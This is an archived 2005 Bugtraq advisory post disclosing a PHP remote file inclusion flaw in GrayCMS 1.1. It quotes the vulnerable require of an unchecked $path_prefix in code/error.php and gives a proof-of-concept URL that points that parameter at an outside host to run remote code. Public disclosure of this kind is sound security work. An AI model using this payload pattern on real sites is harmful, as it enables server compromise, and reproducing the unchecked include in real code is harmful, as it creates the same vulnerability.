GrayCMS php code injection
From: Kold (maggik_at_gala.net)
Date: 04/26/05
- Previous message: Max Cerny: "[exploits] phpMyVisites 1.3 local file retrieval"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 Apr 2005 11:45:32 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Version: 1.1
Severity: High
Vendor: http://gcms.graymur.net/
Vulnerable code is in "code/error.php":
<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {
...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}
require $path_prefix.'code/blocks.php';
exit;
<----end---->
PoC:
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
mail me: maggik <at> gala <dot> net
icq: 3316667
greetz to: ghc, 0xdeadbabe, unl0ck & others
- Previous message: Max Cerny: "[exploits] phpMyVisites 1.3 local file retrieval"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
